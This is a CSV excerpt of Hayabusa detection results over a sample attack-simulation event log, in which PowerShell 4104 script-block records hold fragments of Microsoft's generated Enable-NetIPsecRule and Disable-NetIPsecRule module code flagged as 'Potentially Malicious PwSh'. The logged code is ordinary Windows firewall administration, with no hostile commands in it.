[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, 
[Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecP",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.774 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,") -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if 
($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 
'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Enable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Enable-NetIPsecRule' -Alias '*' function Disable-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, 
[Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecP",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.774 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"hase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, 
[Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters 
$__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) 
$__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } 
if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) 
$__cmdletization_queryBuilde",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.774 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"hase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] 
